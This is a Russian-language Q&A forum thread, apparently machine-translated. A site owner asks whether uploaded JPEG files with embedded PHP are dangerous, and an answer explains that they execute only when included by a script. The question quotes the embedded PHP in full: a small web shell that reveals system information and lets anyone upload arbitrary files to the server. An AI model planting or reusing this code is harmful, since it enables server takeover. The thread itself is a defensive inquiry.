2015-08-14 3 views
2

Пользователь загрузил некоторые jpg-изображения, которые, как представляется, содержат некоторый PHP-код. Файл начинается с ÿØÿà, за которым следует NUL DLE JFIF NUL SOH SOH SOH NUL NUL NUL NUL ÿ NUL SYN Exif NUL NUL II * ... (много больше нулевых символов и т. Д.). Затем введите следующий код php:Пользователь загрузил jpg-файл, содержащий php-код - это потенциальный вирус

echo '<b><br><br>'.php_uname().'<br></b>'; 
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
if($_POST['_upl'] == "Upload") { 
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } 
     else { echo '<b>Upload GAGAL !!!</b><br><br>'; } 
} 

, а затем много двоичного кода. На изображении изображена нога с черным (например, положить ногу на сканер или копир).

Являются ли эти изображения потенциально опасными? Если да, то каким образом.

ответ

1

Да. Это код впрыска, который эксплуатирует известную ошибку, далее: http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/

Эти изображения только выполнить код, если ваш скрипт использует require($image) или include($image) для отображения изображения, в противном случае, не беспокойтесь. Не забудьте отслеживать пользователя и, возможно, включить его в черный список :)

Смежные вопросы